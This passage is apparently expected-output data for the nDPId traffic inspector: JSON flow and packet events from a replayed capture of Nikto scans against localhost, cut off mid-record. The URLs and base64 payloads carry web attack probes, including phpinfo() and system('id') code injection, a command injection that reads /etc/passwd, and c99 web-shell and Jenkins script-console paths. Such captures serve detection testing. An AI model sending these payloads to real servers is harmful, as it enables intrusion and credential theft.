-01095{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":762,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":762,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277922,"flow_last_seen":1576420277922,"flow_idle_time":7440000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":176,"midstream":1,"thread_ts_msec":1576420277922,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51086,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": 
{"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/3rdparty\/phpmyadmin\/server_sync.php?c=phpinfo()","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006608)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":763,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":763,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277923,"flow_last_seen":1576420277923,"flow_idle_time":7440000,"flow_min_l4_payload_len":167,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":167,"midstream":1,"thread_ts_msec":1576420277923,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51088,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":763,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":763,"flow_packet_id":1,"flow_last_seen":1576420277923,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":233,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":233,"pkt_l4_len":199,"thread_ts_msec":1576420277923,"pkt":"AAAAAAAAAAAAAAAACABFAADb3d5AAEAGXjx\/AAABfwAAAceQH5AJweSWVSMF84AYAED+zwAAAQEICp1m\/8udZv\/LR0VUIC9waHBteWFkbWluL3NlcnZlcl9zeW5jLnBocD9jPXBocGluZm8oKSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNjYwOCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} 
-01085{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":763,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":763,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277923,"flow_last_seen":1576420277923,"flow_idle_time":7440000,"flow_min_l4_payload_len":167,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":167,"midstream":1,"thread_ts_msec":1576420277923,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51088,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpmyadmin\/server_sync.php?c=phpinfo()","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006608)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":764,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":764,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277925,"flow_last_seen":1576420277925,"flow_idle_time":7440000,"flow_min_l4_payload_len":160,"flow_max_l4_payload_len":160,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":160,"midstream":1,"thread_ts_msec":1576420277925,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51090,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00695{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":764,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":764,"flow_packet_id":1,"flow_last_seen":1576420277925,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":226,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":226,"pkt_l4_len":192,"thread_ts_msec":1576420277925,"pkt":"AAAAAAAAAAAAAAAACABFAADU+B5AAEAGRAN\/AAABfwAAAceSH5DHT8FWYmCfAYAYAED+yAAAAQEICp1m\/82dZv\/NR0VUIC9wbWEvc2VydmVyX3N5bmMucGhwP2M9cGhwaW5mbygpIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDY2MDgpDQoNCg=="} -01078{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":764,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":764,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277925,"flow_last_seen":1576420277925,"flow_idle_time":7440000,"flow_min_l4_payload_len":160,"flow_max_l4_payload_len":160,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":160,"midstream":1,"thread_ts_msec":1576420277925,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51090,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/pma\/server_sync.php?c=phpinfo()","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006608)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":765,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":765,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277926,"flow_last_seen":1576420277926,"flow_idle_time":7440000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420277926,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51092,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":765,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":765,"flow_packet_id":1,"flow_last_seen":1576420277926,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":202,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":202,"pkt_l4_len":168,"thread_ts_msec":1576420277926,"pkt":"AAAAAAAAAAAAAAAACABFAAC8cdVAAEAGymR\/AAABfwAAAceUH5AbWUib+wxcy4AYAED+sAAAAQEICp1m\/86dZv\/OR0VUIC9jOTkucGhwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDY3MzkpDQoNCg=="} -01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":765,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":765,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277926,"flow_last_seen":1576420277926,"flow_idle_time":7440000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420277926,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51092,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/c99.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006739)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":766,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":766,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277928,"flow_last_seen":1576420277928,"flow_idle_time":7440000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"thread_ts_msec":1576420277928,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51094,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00747{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":766,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":766,"flow_packet_id":1,"flow_last_seen":1576420277928,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":265,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":265,"pkt_l4_len":231,"thread_ts_msec":1576420277928,"pkt":"AAAAAAAAAAAAAAAACABFAAD73s9AAEAGXSt\/AAABfwAAAceWH5B+NOeIVrpz2oAYAED+7wAAAQEICp1m\/9CdZv\/PR0VUIC9hd2N1c2VyL2NnaS1iaW4vdmNzP3hzbD0vdmNzL3Zjc19ob21lLnhzbCUyNmNhdCUyMCUyMi9ldGMvcGFzc3dkJTIyJTI2IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA2OTk0KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
-01122{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":766,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":766,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277928,"flow_last_seen":1576420277928,"flow_idle_time":7440000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"thread_ts_msec":1576420277928,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51094,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/awcuser\/cgi-bin\/vcs?xsl=\/vcs\/vcs_home.xsl%26cat%20%22\/etc\/passwd%22%26","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006994)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":767,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":767,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277929,"flow_last_seen":1576420277929,"flow_idle_time":7440000,"flow_min_l4_payload_len":135,"flow_max_l4_payload_len":135,"flow_tot_l4_payload_len":135,"flow_avg_l4_payload_len":135,"midstream":1,"thread_ts_msec":1576420277929,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51096,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":767,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":767,"flow_packet_id":1,"flow_last_seen":1576420277929,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":201,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":201,"pkt_l4_len":167,"thread_ts_msec":1576420277929,"pkt":"AAAAAAAAAAAAAAAACABFAAC7MdtAAEAGCmB\/AAABfwAAAceYH5BhLQiUIFdU+oAYAED+rwAAAQEICp1m\/9GdZv\/RR0VUIC9zY3JpcHQgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDY5OTkpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":767,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":767,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277929,"flow_last_seen":1576420277929,"flow_idle_time":7440000,"flow_min_l4_payload_len":135,"flow_max_l4_payload_len":135,"flow_tot_l4_payload_len":135,"flow_avg_l4_payload_len":135,"midstream":1,"thread_ts_msec":1576420277929,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51096,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/script","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006999)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":768,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":768,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277931,"flow_last_seen":1576420277931,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277931,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51098,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":768,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":768,"flow_packet_id":1,"flow_last_seen":1576420277931,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277931,"pkt":"AAAAAAAAAAAAAAAACABFAADDfttAAEAGvVd\/AAABfwAAAceaH5AHCUeUa2pQhIAYAED+twAAAQEICp1m\/9OdZv\/SR0VUIC9qZW5raW5zL3NjcmlwdCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA2OTk5KQ0KDQo="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":768,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":768,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277931,"flow_last_seen":1576420277931,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277931,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51098,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/jenkins\/script","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006999)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":769,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":769,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277933,"flow_last_seen":1576420277933,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277933,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51100,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":769,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":769,"flow_packet_id":1,"flow_last_seen":1576420277933,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277933,"pkt":"AAAAAAAAAAAAAAAACABFAADCrgRAAEAGji9\/AAABfwAAAcecH5DcgpdKIx+4uoAYAED+tgAAAQEICp1m\/9WdZv\/VR0VUIC9odWRzb24vc2NyaXB0IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA2OTk5KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
-01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":769,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":769,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277933,"flow_last_seen":1576420277933,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277933,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51100,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/hudson\/script","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006999)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":770,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":770,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277971,"flow_last_seen":1576420277971,"flow_idle_time":7440000,"flow_min_l4_payload_len":296,"flow_max_l4_payload_len":296,"flow_tot_l4_payload_len":296,"flow_avg_l4_payload_len":296,"midstream":1,"thread_ts_msec":1576420277971,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51148,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00877{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":770,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":770,"flow_packet_id":1,"flow_last_seen":1576420277971,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":362,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":362,"pkt_l4_len":328,"thread_ts_msec":1576420277971,"pkt":"AAAAAAAAAAAAAAAACABFAAFctdFAAEAGhch\/AAABfwAAAcfMH5DMiIyc+KcBsoAYAED\/UAAAAQEICp1m\/\/udZv\/7R0VUIC9tb2FkbWluLnBocD9jb2xsZWN0aW9uPXNlY3B1bHNlJmFjdGlvbj1saXN0Um93cyZmaW5kPWFycmF5KCk7cGhwaW5mbygpO2V4aXQ7IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDcwMTEpDQpDb250ZW50LUxlbmd0aDogMjINCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQoNCm9iamVjdD0xO3N5c3RlbSgnaWQnKTs="} -01122{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":770,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":770,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277971,"flow_last_seen":1576420277971,"flow_idle_time":7440000,"flow_min_l4_payload_len":296,"flow_max_l4_payload_len":296,"flow_tot_l4_payload_len":296,"flow_avg_l4_payload_len":296,"midstream":1,"thread_ts_msec":1576420277971,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51148,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) 
(Test:007011)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":771,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":771,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277972,"flow_last_seen":1576420277972,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277972,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51150,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00893{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":771,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":771,"flow_packet_id":1,"flow_last_seen":1576420277972,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1576420277972,"pkt":"AAAAAAAAAAAAAAAACABFAAFnwDVAAEAGe1l\/AAABfwAAAcfOH5AQvflnbGoufoAYAED\/WwAAAQEICp1m\/\/ydZv\/8R0VUIC9waHBtb2FkbWluL21vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzAxMSkNCkNvbnRlbnQtTGVuZ3RoOiAyMg0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="} 
-01134{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":771,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":771,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277972,"flow_last_seen":1576420277972,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277972,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51150,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpmoadmin\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":772,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":772,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277974,"flow_last_seen":1576420277974,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277974,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51152,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00893{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":772,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":772,"flow_packet_id":1,"flow_last_seen":1576420277974,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1576420277974,"pkt":"AAAAAAAAAAAAAAAACABFAAFncRdAAEAGynd\/AAABfwAAAcfQH5DeNEhBp6LH9oAYAED\/WwAAAQEICp1m\/\/2dZv\/9R0VUIC93dS1tb2FkbWluL21vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDcwMTEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpDb250ZW50LUxlbmd0aDogMjINCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpIb3N0OiAxMjcuMC4wLjENCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="} -01134{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":772,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":772,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277974,"flow_last_seen":1576420277974,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277974,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51152,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 